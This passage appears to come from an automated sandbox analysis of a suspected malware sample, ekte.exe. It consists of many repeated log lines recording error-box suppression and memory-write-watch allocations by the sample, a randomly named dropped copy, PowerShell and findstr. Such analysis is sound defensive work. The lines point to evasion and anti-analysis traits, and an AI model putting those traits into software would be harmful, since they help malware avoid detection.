            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: 1B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: A40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: 8980000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: 9980000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: 9B80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ekte.exeMemory allocated: AB80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 240000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 2330000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 6D30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeMemory allocated: 7D30000 memory reserve | memory write watchJump to behavior
